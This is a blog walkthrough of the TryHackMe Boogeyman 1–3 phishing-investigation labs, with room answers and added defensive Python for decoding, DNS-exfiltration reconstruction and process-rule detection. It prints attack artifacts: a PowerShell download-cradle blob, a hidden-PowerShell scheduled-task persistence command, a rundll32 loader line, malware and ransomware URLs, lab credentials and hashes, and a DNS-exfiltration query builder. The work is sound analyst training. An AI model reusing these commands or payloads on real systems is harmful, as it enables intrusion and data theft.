Introduction

This post and the accompanying video walk through the analysis of three cyberattack scenarios in which a phishing email was the initial entry point. The three TryHackMe Boogeyman challenges, which form the capstone of the TryHackMe SOC Level 1 path, serve as realistic case studies for SOC analysts and threat hunters.

What is Blue Team in Cyber Security?

In cybersecurity, the “Blue Team” refers to a group of security professionals responsible for defending an organization’s information systems. Their primary role is to protect, monitor, and respond to security incidents. Blue Teams focus on:

  • Detecting vulnerabilities within systems and networks
  • Implementing security measures like firewalls, intrusion detection systems, and encryption
  • Monitoring for threats using security tools and logs
  • Responding to incidents and mitigating attacks when they occur
  • Performing regular security assessments to strengthen the organization’s defenses

They often work opposite the “Red Team,” which simulates attacks to test the Blue Team’s defenses.

What is SOC Analyst in Cyber Security

A SOC Analyst (Security Operations Center Analyst) is a cybersecurity professional who monitors and defends an organization’s IT infrastructure from cyber threats. Their main responsibilities include:

  1. Monitoring Security Alerts: Continuously reviewing logs, alerts, and other system notifications from security tools like firewalls, intrusion detection/prevention systems, and SIEM (Security Information and Event Management) platforms.
  2. Incident Detection and Response: Investigating potential security incidents and taking steps to contain, mitigate, and resolve them. This may involve isolating infected systems, analyzing malware, and coordinating with other teams to respond effectively.
  3. Threat Hunting: Proactively searching for potential threats that have not been detected by automated tools by analyzing trends and unusual activity.
  4. Reporting and Documentation: Creating reports on security incidents, vulnerabilities, and risks, and documenting their findings for future analysis or compliance.
  5. Collaboration: Working with other defensive and IT teams (incident response, threat intelligence, engineering) to strengthen defenses and implement security policies and best practices.

SOC Analysts typically work in a Security Operations Center, where they monitor and safeguard the organization’s digital environment 24/7.

Breakdown of The Attack Scenarios

Scenario 1: Phishing Email with a Shortcut File:
In the first scenario, the phishing email carries a password-protected attachment containing a Windows shortcut (.lnk). Opening the shortcut launches PowerShell with a Base64-encoded command that downloads and runs a stager from the attacker's file server; the data theft that follows is driven from that foothold. The email was sent to an employee of Quick Logistics LLC, and the analysis covers the message headers, the attachment, and the shortcut's Command Line Arguments field, which lnkparse exposes so the encoded command can be recovered.

The decoded command contacts the attacker's infrastructure to pull additional files, and the session is later used to stage commands through a Command-and-Control (C2) domain. The email was sent through a third-party mail relay service (Elastic Email) to look legitimate and get past spam filtering. The encoded payload is Base64 over UTF-16LE, which is what PowerShell's -EncodedCommand expects, so decoding it on the command line takes echo and base64 -d followed by a UTF-16LE to UTF-8 conversion (for example with iconv), not base64 alone. The investigation then follows the attacker to a stolen KeePass database, which is exfiltrated hex-encoded over DNS using nslookup queries.
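As an added example that is not code from the original post or from TryHackMe, the decoding step above in Python: it takes the encoded string that lnkparse reports for the shortcut (the value listed in the Boogeyman 1 answers further down), decodes it as Base64 over UTF-16LE the way PowerShell's -EncodedCommand does, pulls out the URL, and flags the download-cradle keywords an analyst would triage on. The indicator list and the fallback for plain-ASCII Base64 blobs are my own choices, not part of the room.

```python
import base64
import re

# Encoded value from the shortcut's Command Line Arguments field, as reported by lnkparse
# (copied from the Boogeyman 1 answers on this page).
ENCODED_COMMAND = "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="

# Cmdlets and methods that mark a download cradle or an in-memory loader (my own triage list).
CRADLE_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string",
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def decode_powershell_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand value.

    PowerShell expects Base64 over UTF-16LE, so the decoded bytes alternate ASCII and NUL
    ('i\\x00e\\x00x\\x00...'); reading them as UTF-8 gives text riddled with NULs.
    A plain Base64(ASCII) blob, which some loaders use instead, has no NUL high bytes
    and is decoded as UTF-8 (assumption: the heuristic below is mine).
    """
    raw = base64.b64decode(b64, validate=True)
    high_bytes = raw[1::2]
    if len(raw) % 2 == 0 and high_bytes.count(0) * 2 > len(high_bytes):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def find_cradle_indicators(script: str) -> list:
    """Return the indicators present in the decoded script, in list order."""
    low = script.lower()
    return [i for i in CRADLE_INDICATORS if i in low]


def extract_urls(script: str) -> list:
    """Pull every http(s) URL out of the decoded script (the staging/C2 hosts)."""
    return URL_RE.findall(script)


def analyse(b64: str) -> dict:
    script = decode_powershell_encoded_command(b64)
    return {
        "script": script,
        "urls": extract_urls(script),
        "indicators": find_cradle_indicators(script),
    }


if __name__ == "__main__":
    for key, value in analyse(ENCODED_COMMAND).items():
        print(f"{key}: {value}")
```

On the command line the equivalent is `echo '<blob>' | base64 -d | iconv -f UTF-16LE -t UTF-8`. Piping `base64 -d` straight to the terminal prints the NUL-interleaved text, which is why a plain `base64 -d` can look almost right while grep and string matching silently fail on it.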

Scenario 2: Word Document with a VBA Macro:
In the second scenario, the phishing email carries a Word document posing as a resume, with an embedded VBA macro. When the document is opened, the macro downloads a stage 2 JScript payload (update.js) from the attacker's server and runs it with wscript.exe; that script in turn fetches an executable, which is launched from C:\Windows\Tasks as updater.exe and establishes the C2 connection. Right after the callback the attacker creates a scheduled task that runs a hidden PowerShell command whose body is stored Base64-encoded in a registry value, giving persistent control over the system. The analysts pull these artifacts, including the C2 address and the persistence command, from process telemetry and a memory dump of the workstation.

Scenario 3: HTA File and Domain Compromise:
The third attack starts with an HTA (HTML Application) attachment which, when opened, retrieves a payload from the internet, copies review.dat from the D: drive into the user's Temp folder and executes it through rundll32.exe via its DllRegisterServer export, then creates a scheduled task for persistence and opens a C2 connection. From there the attacker bypasses UAC with fodhelper.exe, dumps credentials with Mimikatz, moves laterally over WinRM using the recovered hash and a password found in a script on a file share, runs a DCSync against the domain controller, and finally downloads a ransomware binary. The analysts reconstruct each step from the logs in Elasticsearch.

TryHackMe Boogeyman 1

Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.

You are tasked to analyse and assess the impact of the compromise.

Room Answers

What is the email address used to send the phishing email?

agriffin@bpakcaging.xyz

What is the email address of the victim?

julianne.westcott@hotmail.com

What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?

elasticemail

What is the name of the file inside the encrypted attachment?

Invoice_20230103.lnk

What is the password of the encrypted attachment?

Invoice2023!

Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?

aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==

What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)

cdn.bpakcaging.xyz,files.bpakcaging.xyz

What is the name of the enumeration tool downloaded by the attacker?

seatbelt

What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.

C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

What is the software that uses the file in Q3?

Microsoft Sticky Notes

What is the name of the exfiltrated file?

protected_data.kdbx

What type of file uses the .kdbx file extension?

keepass

What is the encoding used during the exfiltration attempt of the sensitive file?

hex

What is the tool used for exfiltration?

nslookup

What software is used by the attacker to host its presumed file/payload server?

python

What HTTP method is used by the C2 for the output of the commands executed by the attacker?

POST

What is the protocol used during the exfiltration activity?

dns

What is the password of the exfiltrated file?

%p9^3!lL^Mz47E2GaT^y

What is the credit card number stored inside the exfiltrated file?

4024007128269551
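To make the hex-over-DNS exfiltration answered above concrete, here is an added example of my own (not code from the room or from the post) that shows both halves: how a file is hex-encoded and split across nslookup-style query names, and how a defender reconstructs the file from query names extracted from a capture. The sample bytes, the noise lookups and the choice of bpakcaging.xyz as the exfiltration zone are constructed assumptions; the room's real protected_data.kdbx is not used, and the exact label scheme the room used is not reproduced.

```python
import binascii
import re

# Assumption for the demo: the attacker-controlled zone that receives the lookups.
EXFIL_ZONE = "bpakcaging.xyz"
LABEL_LEN = 60  # a DNS label holds at most 63 octets; 60 keeps every chunk an even number of hex digits


def build_exfil_queries(data: bytes, zone: str = EXFIL_ZONE, label_len: int = LABEL_LEN) -> list:
    """Attacker side: hex-encode the bytes and emit one query name per chunk, which is
    what a loop around `nslookup <chunk>.<zone>` produces on the wire."""
    hexed = binascii.hexlify(data).decode("ascii")
    return [f"{hexed[i:i + label_len]}.{zone}" for i in range(0, len(hexed), label_len)]


HEX_LABEL = re.compile(r"^[0-9a-f]+$")


def reconstruct_from_queries(query_names, zone: str = EXFIL_ZONE) -> bytes:
    """Defender side: keep only queries under `zone` whose leftmost label is pure hex,
    concatenate the labels in capture order and decode them back to bytes."""
    suffix = "." + zone.lower()
    chunks = []
    for name in query_names:
        name = name.strip().rstrip(".").lower()
        if not name.endswith(suffix):
            continue  # lookups for other domains
        label = name[: -len(suffix)]
        if "." in label or not HEX_LABEL.match(label):
            continue  # ordinary hostnames under the same zone (cdn, files, ...)
        chunks.append(label)
    hexed = "".join(chunks)
    if len(hexed) % 2:
        raise ValueError("odd number of hex digits: a query was dropped or truncated")
    return binascii.unhexlify(hexed)


# Constructed sample traffic: a fake file split the attacker's way, with normal lookups mixed in.
SAMPLE_DATA = b"constructed sample: not the real protected_data.kdbx\n"
SAMPLE_QUERIES = (
    ["cdn.bpakcaging.xyz", "login.microsoftonline.com"]
    + build_exfil_queries(SAMPLE_DATA)[:1]
    + ["files.bpakcaging.xyz"]
    + build_exfil_queries(SAMPLE_DATA)[1:]
)

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q)
    print(reconstruct_from_queries(SAMPLE_QUERIES))
```

With a real capture, feed the output of `tshark -r capture.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name` into reconstruct_from_queries. Real traffic also needs ordering by frame time and de-duplication of retried queries, which this example does not attempt, and a short all-hex label can occasionally be a legitimate hostname, so pair the hex check with query volume and label length when turning this into a detection.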

TryHackMe Boogeyman 2

Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application for one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.

The security team was able to flag some suspicious commands executed on the workstation of Maxine, which prompted the investigation. Given this, you are tasked to analyse and assess the impact of the compromise.

Room Answers

What email was used to send the phishing email?

westaylor23@outlook.com

What is the email of the victim employee?

maxine.beck@quicklogisticsorg.onmicrosoft.com

What is the name of the attached malicious document?

Resume_WesleyTaylor.doc

What is the MD5 hash of the malicious attachment?

52c4384a0b9e248b95804352ebec6c5b

What URL is used to download the stage 2 payload based on the document’s macro?

https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png

What is the name of the process that executed the newly downloaded stage 2 payload?

wscript.exe

What is the full file path of the malicious stage 2 payload?

C:\ProgramData\update.js

What is the PID of the process that executed the stage 2 payload?

4260

What is the parent PID of the process that executed the stage 2 payload?

1124

What URL is used to download the malicious binary executed by the stage 2 payload?

https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe

What is the PID of the malicious process used to establish the C2 connection?

6216

What is the full file path of the malicious process used to establish the C2 connection?

C:\Windows\Tasks\updater.exe

What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)

128.199.95.189:8080

What is the full file path of the malicious email attachment based on the memory dump?

C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc

The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?

schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"'

TryHackMe Boogeyman 3

Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson. 

The email appeared questionable, but Evan still opened the attachment despite his scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.

Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.

Room Answers

What is the PID of the process that executed the initial stage 1 payload?

6392

The stage 1 payload attempted to implant a file to another location. What is the full command-line value of this execution?

"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat

The implanted file was eventually used and executed by the stage 1 payload. What is the full command-line value of this execution?

"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer

The stage 1 payload established a persistence mechanism. What is the name of the scheduled task created by the malicious script?

Review

The execution of the implanted file inside the machine has initiated a potential C2 connection. What is the IP and port used by this connection? (format: IP:port)

165.232.170.151:80

The attacker has discovered that the current access is a local administrator. What is the name of the process used by the attacker to execute a UAC bypass?

fodhelper.exe

Having a high privilege machine access, the attacker attempted to dump the credentials inside the machine. What is the GitHub link used by the attacker to download a tool for credential dumping?

https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

After successfully dumping the credentials inside the machine, the attacker used the credentials to gain access to another machine. What is the username and hash of the new credential pair? (format: username:hash)

itadmin:F84769D250EB95EB2D7D8B4A1C5613F2

Using the new credentials, the attacker attempted to enumerate accessible file shares. What is the name of the file accessed by the attacker from a remote share?

IT_Automation.ps1

After getting the contents of the remote file, the attacker used the new credentials to move laterally. What is the new set of credentials discovered by the attacker? (format: username:password)

QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987

What is the hostname of the attacker’s target machine for its lateral movement attempt?

WKSTN-1327

Using the malicious command executed by the attacker from the first machine to move laterally, what is the parent process name of the malicious command executed on the second compromised machine?

wsmprovhost.exe

The attacker then dumped the hashes in this second machine. What is the username and hash of the newly dumped credentials? (format: username:hash)

administrator:00f80f2538dcb54e7adc715c0e7091ec

After gaining access to the domain controller, the attacker attempted to dump the hashes via a DCSync attack. Aside from the administrator account, what account did the attacker dump?

backupda

After dumping the hashes, the attacker attempted to download another remote file to execute ransomware. What is the link used by the attacker to download the ransomware binary?

http://ff.sillytechninja.io/ransomboogey.exe
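The Boogeyman 2 persistence command and the Boogeyman 3 chain (rundll32.exe loading review.dat, the fodhelper.exe UAC bypass, remote commands running under wsmprovhost.exe) all show up in process-creation telemetry. As an added example, not from the post or from TryHackMe, the following Python applies four such rules to a handful of constructed Sysmon-style events. The schtasks and rundll32 command lines are the ones recovered on this page; every PID, every parent image (mshta.exe as the parent of rundll32 is an assumption) and the two benign events are invented for the demo.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon event 1 or Windows 4688 provide)."""
    pid: int
    parent_image: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Switches and cmdlets that hide or decode a PowerShell payload at run time.
POWERSHELL_EVASION = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-noni(?:nteractive)?\b|frombase64string|\biex\b|invoke-expression",
    re.I,
)
# rundll32[.exe] <module>,<export>: capture the module path and the export name.
RUNDLL32_ARGS = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^\s",]+)\s*,\s*(\w+)', re.I)


def rule_schtasks_hidden_powershell(e: ProcEvent) -> bool:
    """schtasks /Create whose /TR action is a hidden, non-interactive or decoded PowerShell command."""
    if _basename(e.image) != "schtasks.exe" or not re.search(r"/create\b", e.cmdline, re.I):
        return False
    m = re.search(r"/tr\s+(.*)", e.cmdline, re.I | re.S)
    action = m.group(1) if m else ""
    return "powershell" in action.lower() and POWERSHELL_EVASION.search(action) is not None


def rule_fodhelper_child(e: ProcEvent) -> bool:
    """fodhelper.exe normally spawns nothing; a child process is the tell-tale of the UAC bypass."""
    return _basename(e.parent_image) == "fodhelper.exe"


def rule_wsmprovhost_child(e: ProcEvent) -> bool:
    """wsmprovhost.exe hosts inbound WinRM sessions, so its children are commands run from another host."""
    return _basename(e.parent_image) == "wsmprovhost.exe"


def rule_rundll32_non_dll(e: ProcEvent) -> bool:
    """rundll32 asked to load a module whose name does not end in .dll (review.dat in Boogeyman 3)."""
    if _basename(e.image) != "rundll32.exe":
        return False
    m = RUNDLL32_ARGS.search(e.cmdline)
    return m is not None and not m.group(1).lower().endswith(".dll")


RULES = {
    "persistence.schtasks_hidden_powershell": rule_schtasks_hidden_powershell,
    "privesc.fodhelper_uac_bypass_child": rule_fodhelper_child,
    "lateral.winrm_remote_execution": rule_wsmprovhost_child,
    "execution.rundll32_non_dll_module": rule_rundll32_non_dll,
}


def evaluate(events) -> list:
    """Return (rule name, pid) for every event that matches a rule, in event order."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed events. The two command lines quoted from this page are real; PIDs, parent images
# and the two benign events at the end are invented so the rules have something to ignore.
SAMPLE_EVENTS = [
    ProcEvent(5120, r"C:\Windows\Tasks\updater.exe", r"C:\Windows\System32\schtasks.exe",
              r"""schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"'"""),
    ProcEvent(5121, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer'),
    ProcEvent(5122, r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c powershell -ep bypass'),
    ProcEvent(5123, r"C:\Windows\System32\wsmprovhost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoP -c whoami"),
    ProcEvent(5201, r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'),
    ProcEvent(5202, r"C:\Windows\explorer.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Create /SC DAILY /TN Backup /TR "C:\Tools\backup.exe"'),
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}")
```

The wsmprovhost.exe rule fires on every remote PowerShell session, legitimate administration included, so in production it is an enrichment for the other alerts (who ran what from where) rather than a stand-alone alarm; the fodhelper.exe and non-DLL rundll32 rules are specific enough to page on.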

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
